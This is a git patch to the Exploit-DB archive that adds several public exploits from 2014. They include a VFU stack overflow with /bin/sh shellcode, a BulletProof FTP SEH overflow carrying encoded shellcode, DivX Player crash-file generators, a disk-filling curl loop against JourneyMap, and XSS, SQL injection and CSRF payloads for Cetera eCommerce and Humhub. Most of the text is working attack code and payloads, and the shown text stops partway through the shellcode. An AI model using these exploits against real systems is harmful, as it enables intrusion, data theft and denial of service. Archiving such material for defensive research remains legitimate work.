From 19bac3ab1e837d2e70ed6a5b8154afc620e9d764 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 11 Dec 2014 04:47:31 +0000
Subject: [PATCH] Updated 12_11_2014

---
 files.csv                           |  12 +-
 platforms/linux/local/35450.txt     |  29 ++++
 platforms/multiple/remote/35339.txt |  38 ++++++
 platforms/php/webapps/35508.txt     |  26 ++++
 platforms/php/webapps/35510.txt     |  27 ++++
 platforms/php/webapps/35511.txt     |  45 +++++++
 platforms/windows/dos/35507.pl      | 198 ++++++++++++++++++++++++++++
 platforms/windows/local/35449.rb    | 120 +++++++++++++++++
 platforms/windows/local/35503.rb    | 131 ++++++++++++++++++
 platforms/windows/local/35512.txt   |  47 +++++++
 platforms/windows/remote/35509.pl   | 113 ++++++++++++++++
 11 files changed, 785 insertions(+), 1 deletion(-)
 create mode 100755 platforms/linux/local/35450.txt
 create mode 100755 platforms/multiple/remote/35339.txt
 create mode 100755 platforms/php/webapps/35508.txt
 create mode 100755 platforms/php/webapps/35510.txt
 create mode 100755 platforms/php/webapps/35511.txt
 create mode 100755 platforms/windows/dos/35507.pl
 create mode 100755 platforms/windows/local/35449.rb
 create mode 100755 platforms/windows/local/35503.rb
 create mode 100755 platforms/windows/local/35512.txt
 create mode 100755 platforms/windows/remote/35509.pl

diff --git a/files.csv b/files.csv
index 635df73b3..aa838193d 100755
--- a/files.csv
+++ b/files.csv
@@ -9834,7 +9834,7 @@ id,file,description,date,author,platform,type,port
 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0
 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0
 10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0
-10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 (CGI) - Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0
+10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0
 10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,indoushka,php,webapps,0
 10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0
 10613,platforms/linux/local/10613.c,"2.6.18-20 2009 Local Root Exploit",2009-12-23,DigitALL,linux,local,0
@@ -31831,6 +31831,7 @@ id,file,description,date,author,platform,type,port
 35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
 35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
 35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
+35339,platforms/multiple/remote/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - DoS (Resource Consumption)",2014-11-24,CovertCodes,multiple,remote,0
 35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
 35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0
 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0
@@ -31930,6 +31931,8 @@ id,file,description,date,author,platform,type,port
 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x 'modrdn' NULL OldDN Remote Denial of Service Vulnerability",2011-01-03,"Serge Dubrouski",linux,dos,0
 35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 '.avi' File Remote Buffer Overflow Vulnerability",2011-03-10,KedAns-Dz,windows,remote,0
 35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
+35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0
+35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0
 35451,platforms/php/webapps/35451.txt,"BoutikOne categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35452,platforms/php/webapps/35452.txt,"BoutikOne list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
 35453,platforms/php/webapps/35453.txt,"BoutikOne search.php Multiple Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
@@ -31973,3 +31976,10 @@ id,file,description,date,author,platform,type,port
 35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 'subject' Parameter HTML Injection Vulnerability",2011-03-25,"Zero Science Lab",php,webapps,0
 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator  7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
+35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
+35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
+35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
+35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0
+35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
+35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
+35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0
diff --git a/platforms/linux/local/35450.txt b/platforms/linux/local/35450.txt
new file mode 100755
index 000000000..d1bc28efe
--- /dev/null
+++ b/platforms/linux/local/35450.txt
@@ -0,0 +1,29 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com
+<jsacco@exploitpack.com>
+# Tested on: GNU/Linux - Debian Wheezy
+# Description: VFU v4.10-1.1 is prone to a stack-based buffer overflow
+# vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker can exploit this issue to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Vendor homepage: VFU v4.10-1.1 ( Latest version ) -
+http://cade.datamax.bg/vfu/
+# Debian package: https://packages.debian.org/wheezy/vfu
+
+buffersize =  803
+nopsled = "\x90"
+shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+eip = "\x10\xf0\xff\xbf"
+buffer = nopsled * (buffersize-len(shellcode)) + eip
+
+try:
+   subprocess.call(["vfu -d", buffer])
+except OSError as e:
+   if e.errno == os.errno.ENOENT:
+       print "VFU not found!"
+   else:
+   print "Error executing exploit"
+   raise
diff --git a/platforms/multiple/remote/35339.txt b/platforms/multiple/remote/35339.txt
new file mode 100755
index 000000000..280a7a310
--- /dev/null
+++ b/platforms/multiple/remote/35339.txt
@@ -0,0 +1,38 @@
+# Exploit Title: JourneyMap Disk-space consumption exploit
+# Date: 23Nov2014
+# Exploit Author: CovertCodes
+# Vendor Homepage: http://journeymap.techbrew.net/
+# Software Link: http://journeymap.techbrew.net/download/
+# Version: 5.0.0RC2 Ultimate Edition
+# Tested on: Linux
+
+
+  JourneyMap (http://journeymap.techbrew.net/) is a mapping mod for 
+Minecraft.  It comes included with some modpacks, and is enabled by 
+default in the popular Feed the Beast client.  JourneyMap opens a web 
+server on the client which is configured to listen on port 8080.  When 
+the client is running, a remote, unauthenticated user can have 
+JourneyMap save a screenshot of the game to the hard drive by accessing 
+a specific URL, consuming hard drive space.  Here's an example:
+
+#!/bin/bash
+   while true;
+     do
+     curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day
+   done
+
+   This works even when the client has paused the game (by pressing 
+escape.)  We include mapType=day because the software should refuse to 
+save a screenshot if the client user is underground, and the game is set 
+on hardcore mode.
+
+   Accessing the URL and triggering a screenshot will display a message 
+on the client's screen, which may somewhat lessen the severity of this 
+exploit.  Further, it takes a long time to fill up disk using this 
+technique.  JourneyMap allows depth and resolution to be specified in
+the URL as well, though a few simple tests showed no change despite 
+altering these parameters.  If one were able to increase the depth and
+resolution of the image, the drive would fill up faster.
+
+   Tested with JourneyMap 5.0.0RC2 Ultimate Edition, but presumed to 
+work on other versions as well.
diff --git a/platforms/php/webapps/35508.txt b/platforms/php/webapps/35508.txt
new file mode 100755
index 000000000..36014e766
--- /dev/null
+++ b/platforms/php/webapps/35508.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/47044/info
+
+Cetera eCommerce is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cetera eCommerce versions 15.0 and prior are vulnerable. 
+
+Cross Site Scripting:
+
+http://www.example.com/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
+http://www.example.com/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
+http://www.example.com/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
+http://www.example.com/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
+http://www.example.com/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
+http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
+
+This vulnerability have appeared in version 15.0. Vulnerability takes place
+at page with error 404, so it'll work as at this URL, as at other URLs,
+which lead to non-existent pages.
+
+SQL Injection:
+
+http://www.example.com/catalog/(version()=5.1)/
+http://www.example.com/catalog/cart/.+benchmark(100000,md5(now()))+./
+
diff --git a/platforms/php/webapps/35510.txt b/platforms/php/webapps/35510.txt
new file mode 100755
index 000000000..baac0970e
--- /dev/null
+++ b/platforms/php/webapps/35510.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Humhub <= 0.10.0-rc.1 SQL injection vulnerability
+# Date: 08-12-2014
+# Exploit Author: Jos Wetzels, Emiel Florijn
+# Vendor Homepage: https://www.humhub.org
+# Software Link: https://github.com/humhub/humhub/releases
+# Version: <= 0.10.0-rc.1
+
+The Humhub [1] social networking kit versions 0.10.0-rc.1 and prior suffer from an SQL injection vulnerability, which has now been resolved in cooperation with the vendor [2], in its notification listing functionality allowing an attacker to obtain backend database access. In the actionIndex() function located in "/protected/modules_core/notification/controllers/ListController.php" [3] a check is performed on the unsanitized $lastEntryId variable (which is fetched from the 'from' GET parameter) to see if it is greater than 0. However, since PHP uses type-unstrict comparisons and $lastEntryId isn't guaranteed to be an integer, this allows an attacker to prefix their string of choice with any number of integers (so that $lastEntryId gets treated as an integer during the comparison) such that the comparison evaluates to true and $criteria->condition is injected with the otherwise unsanitized $lastEntryId, which can be any SQL injection.
+
+Proof of Concept: Performing the following request
+
+	index.php?r=notification/list/index&from=999) AND (CASE WHEN 0x30<(SELECT substring(password,1,1) FROM user_password WHERE id = 1) THEN 1 ELSE 0 END) AND (1=1
+
+Allows an attacker to perform a binary search SQL injection. In addition, the SQL error handling of the function in question allows the attacker to perform a reflected Cross-Site Scripting attack.
+
+Proof of Concept: Directing any user to the following link
+
+	index.php/?r=notification/list/index&from=999) AND ("<iframe src = 'index.php/?r=user/auth/logout'>"=""
+
+Will perform a CSRF attack against the target user.
+
+It should be noted that the attack requires regular user-level authentication to the humhub system.
+
+[*] References:
+	1. http://humhub.org
+	2. https://github.com/humhub/humhub/commit/febb89ab823d0bd6246c6cf460addabb6d7a01d4
+	3. https://github.com/humhub/humhub/blob/e406538ac44f992774e1abd3748ee0a65469829d/protected/modules_core/notification/controllers/ListController.php#L46
\ No newline at end of file
diff --git a/platforms/php/webapps/35511.txt b/platforms/php/webapps/35511.txt
new file mode 100755
index 000000000..cc35ae62b
--- /dev/null
+++ b/platforms/php/webapps/35511.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Humhub <= 0.10.0-rc.1 multiple persistent XSS vulnerabilities
+# Date: 08-12-2014
+# Exploit Author: Jos Wetzels, Emiel Florijn
+# Vendor Homepage: https://www.humhub.org
+# Software Link: https://github.com/humhub/humhub/releases
+# Version: <= 0.10.0-rc.1
+
+The Humhub [1] social networking kit versions 0.10.0-rc.1 and prior suffer from multiple persistent Cross-Site Scripting vulnerabilities, which have now been resolved in cooperation with the vendor [2], in various parts of the codebase.
+
+1. Post/comment persistent XSS vulnerability
+
+In the function actionPost() in "/protected/modules_core/post/controllers/PostController.php" [3], the $_POST variable is cleaned using a now-outdated version of the Yii framework's CmsInput extension stripClean() function [4], which improperly sanitizes user-input for XSS [5]. This situation also applies to actionPost() in "/protected/modules_core/comment/controllers/CommentController.php" [6]
+
+Proof of Concept: making a post or comment with the URL-encoded form of either:
+	<a href = "data:text/html,test">test</a>
+	<img src = "index.php?r=user/auth/logout">
+
+Will insert the corresponding HTML elements into the post/comment body.
+
+2. Humhub-modules-mail [7] persistent XSS vulnerability
+
+Humhub-modules-mail versions 0.5.9 and prior (when used in conjunction with Humhub 0.10.0-rc.1 or prior) is affected by the same vulnerability as described above. The vulnerable code is located in the function actionCreate() in "/controllers/MailController.php" [8]. Since every private message sent to a humhub user is also sent to the user's e-mail in the form of a HTML-enabled notification e-mail, an attacker can insert custom HTML elements in the body of the e-mail with grave consequences. It should be noted that the displayed in-system private messages are not susceptible to this attack vector.
+
+3. Admin error logging persistent XSS vulnerability
+
+In addition to the above, the admin error logging codebase is vulnerable to a persistent XSS vulnerability (with an even less restrictive set of injectable elements) as well. In most modules' error logging functionality, there is no XSS sanitation on the error message before passing it to the database and since there is no XSS sanitation before displaying error messages in the admin error logging interface, causing an error with a URL-encoded XSS string (different modules' error logging allow for different XSS vectors) in the parameter will cause the XSS to be persistently logged in the admin error logging interface, potentially allowing an attacker, among other attack vectors, to hijack the admin's session.
+
+Proof of Concept: performing either of the following requests:
+		index.php?r=post/post/post%3Csvg%20onload%3Dalert(1)%3E
+		index.php?r=mail/mail/indexdf%3Cimg%20src=%22x%22%20onerror=%22alert(1)%22%3E
+		index.php?r=notification/list/index&from=999)%3Cscript%3Ealert(1)%3C/script%3E
+
+Wil insert the corresponding script elements into the admin error logging interface.
+
+It should be noted that all XSS attack vectors require at least regular user-level access to the humhub system.
+
+[*] References:
+1. http://humhub.org
+2. https://github.com/humhub/humhub/commit/febb89ab823d0bd6246c6cf460addabb6d7a01d4
+3. https://github.com/humhub/humhub/blob/22d4cc040b56ed72c7bdc17a14af087b06a2cf18/protected/modules_core/post/controllers/PostController.php#L41
+4. https://github.com/humhub/humhub/blob/9274a701b316cf8da0d05862066a90a3585fff01/protected/extensions/CmsInput.php#L165
+5. http://packetstormsecurity.com/files/129373/yiicmsinput-xss.txt
+6. https://github.com/humhub/humhub/blob/22d4cc040b56ed72c7bdc17a14af087b06a2cf18/protected/modules_core/comment/controllers/CommentController.php#L139
+7. https://github.com/humhub/humhub-modules-mail
+8. https://github.com/humhub/humhub-modules-mail/blob/04e4f2dad17ed0e4aec0d5a61a5ef979f416e98b/controllers/MailController.php#L300
\ No newline at end of file
diff --git a/platforms/windows/dos/35507.pl b/platforms/windows/dos/35507.pl
new file mode 100755
index 000000000..6a2e2bafa
--- /dev/null
+++ b/platforms/windows/dos/35507.pl
@@ -0,0 +1,198 @@
+source: http://www.securityfocus.com/bid/47042/info
+
+DivX Player is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage these issues to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+DivX Player 6.0, 6.8, 6.9, and 7.0 are vulnerable; other versions may also be affected. 
+
+================================
+#!/usr/bin/perl
+
+###
+# Title : DivX Player v7.0 (.avi) Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : Overflow in 'DivX Player.exe' Process
+# Tested on : Windows XP SP3 Fran.ais 
+# Target : DivX Player v6.8 & 6.9 & 7.0
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# Usage : 1 - Creat AVI file (14 bytes)
+#      =>    2 - Open AVI file With DivX Player
+#      =>    3 -  OverFlow & Crshed !!!
+# ------------
+# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/11535) || By : cr4wl3r 
+# ------------
+# Assembly Error in [quartz.dll] ! 74872224() ! :
+# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
+# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
+# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";                  
+print "    |============================================|\n";
+print "    |= [!] Name : DivX Player v6 & 7.0 AVI File =|\n";
+print "    |= [!] Exploit : Local Buffer Overflow      =|\n";
+print "    |= [!] Author : KedAns-Dz                   =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com       =|\n";
+print "    |============================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; # AVI Header
+open(file , ">", "Kedans.avi"); # Evil File AVI (14 bytes) 4.0 KB
+print file $PoC;  
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);  
+
+# Thanks To : ' cr4wl3r ' From Indonesia & All Indonesia MusLim HacKers
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
+# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
+# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
+# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
+# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
+# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
+#================================================================================================
+
+
+
+================================
+#!/usr/bin/perl
+
+###
+# Title : DivX Player v7.0 (.ape) Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : Overflow in 'DivX Player.exe' Process
+# Tested on : Windows XP SP3 Fran.ais 
+# Target : DivX Player v6.8 & 6.9 & 7.0
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# Usage : 1 - Creat APE file ( Monkey's Audio Format )
+#      =>    2 - Open APE file With DivX Player 
+#      =>    3 -  OverFlow !!!
+# Assembly Error in [MonkeySource.ax] ! 0f4151a6() ! :
+# 0x0f4151a3 ,0xc2 0x80 0x00 [ret] || 8
+# 0x0f4151a6 ,0xf7 0xf3 [div] || eax,abx << (" Error Here ")
+# 0x0f4151a8 ,0x31 0xd2 [xor] || edx,edx
+# 0x0f4151aa ,0xeb 0xf3 [jmp] || 0x0f41519f
+# 0x0f4151ac ,0xc3 [ret] || 
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";                  
+print "    |===========================================================|\n";
+print "    |= [!] Name : DivX Player v6 & 7.0 || Monkey's Audio File  =|\n";
+print "    |= [!] Exploit : Buffer Overflow Exploit                   =|\n";
+print "    |= [!] Author : KedAns-Dz                                  =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
+print "    |===========================================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
+open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
+print file $PoC;  
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);  
+#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
+# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
+# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
+# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
+# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
+# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
+#================================================================================================
+
+
+================================
+#!/usr/bin/perl
+
+###
+# Title : DivX Player v7.0 (.mid) Buffer Overflow
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : Overflow in 'DivX Player.exe' Process
+# Tested on : Windows XP SP3 Fran.ais 
+# Target : DivX Player v6.8 & 6.9 & 7.0
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# Usage : 1 - Creat MID file 
+#      =>    2 - Open MID file With DivX Player 
+#      =>    3 -  OverFlow !!!
+# ------------
+# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/9620) || By : PLATEN 
+# ------------
+# Assembly Error in [quartz.dll] ! 74872224() ! :
+# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
+# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
+# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
+# ------------
+#START SYSTEM /root@MSdos/ :
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+print "\n\n";                  
+print "    |===========================================|\n";
+print "    |= [!] Name : DivX Player v6 & 7.0 (.mid)  =|\n";
+print "    |= [!] Exploit : Buffer Overflow Exploit   =|\n";
+print "    |= [!] Author : KedAns-Dz                  =|\n";
+print "    |= [!] Mail: Ked-h(at)hotmail(dot)com      =|\n";
+print "    |===========================================|\n";
+sleep(2);
+print "\n";
+# Creating ...
+my $PoC = # MID Header
+"\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
+"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
+"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
+"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
+"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
+"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
+"\x00\xff\x2f\x00";
+open(file , ">", "Kedans.mid"); # Evil File MID (100 bytes) 4.0 KB
+print file $PoC;  
+print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
+close(file);  
+
+# Thanks To : ' PLATEN  '  & All Iranian MusLim HacKers
+
+#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
+# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
+# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
+# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
+# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
+# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
+#================================================================================================
+
+
diff --git a/platforms/windows/local/35449.rb b/platforms/windows/local/35449.rb
new file mode 100755
index 000000000..3d38f0ece
--- /dev/null
+++ b/platforms/windows/local/35449.rb
@@ -0,0 +1,120 @@
+#!/usr/bin/env ruby
+# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
+# Date: Dec 03 2014
+# Vulnerability Discovery: Gabor Seljan
+# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
+# Software Link: http://www.bpftp.com/
+# Version: 2010.75.0.76
+# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
+# CVE: CVE-2014-2973
+# Notes: bypass stack size limitation for bigger payload. Allocate 2nd
+# shellcode in heap and copy back to stack. This exploit use egghunter
+# to locate 2nd shellcode in heap and copy to stack using memcpy function.
+
+# Offset
+seh = 93
+filename = "xsession.bps"
+buff = "A" * 400
+
+# ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
+heap_sc =
+"w00tw00t" +
+"\xba\xaa\x8c\x8e\xda\xdb\xd3\xd9\x74\x24\xf4\x5f\x2b\xc9" +
+"\xb1\x44\x31\x57\x14\x83\xef\xfc\x03\x57\x10\x48\x79\x57" +
+"\x31\x17\x5b\x1c\xe2\xd3\x6d\x0f\x58\x6c\xbf\x66\xf9\x19" +
+"\xce\x48\x89\x6b\x3d\x22\xfb\x8f\xb6\x72\x0c\x24\xb6\x5a" +
+"\x87\x0c\x7f\xd4\x8f\x05\x8c\xb3\xae\x34\x8d\xa5\xd1\x3d" +
+"\x1e\x02\x36\xca\x9a\x76\xbd\x98\x0c\xff\xc0\xca\xc6\xb5" +
+"\xda\x81\x83\x69\xda\x7e\xd0\x5e\x95\x0b\x23\x14\x24\xe5" +
+"\x7d\xd5\x16\x39\x81\x85\xdd\x79\x0e\xd1\x1c\xb6\xe2\xdc" +
+"\x59\xa3\x09\xe5\x19\x17\xda\x6f\x03\xdc\x40\xb4\xc2\x09" +
+"\x12\x3f\xc8\x86\x50\x65\xcd\x19\x8c\x11\xe9\x92\x53\xce" +
+"\x7b\xe0\x77\x12\x1d\x2b\xc5\x22\xf4\x7f\xa3\xd6\x8f\xbd" +
+"\xdc\x96\xde\x4f\xf1\xf5\x36\xd0\xf6\x05\x39\x67\x4d\xfe" +
+"\x7d\x09\x96\x1c\xf2\x72\x3a\xc5\xa7\x94\xcd\xfa\xb7\x9b" +
+"\x5b\x41\x40\x0b\x30\x26\x70\x8a\xa0\x85\x42\x22\x55\x82" +
+"\xd7\x49\xf0\x20\x90\xf1\xde\xce\x29\xef\x49\x30\x7c\xeb" +
+"\xfc\x0c\x2f\x48\x56\x32\x9d\x12\x20\x2f\x3a\x38\xc7\x31" +
+"\xbd\x43\xe8\xda\x2e\xc3\x4f\x3b\xd9\x52\x17\x5e\x5b\xfc" +
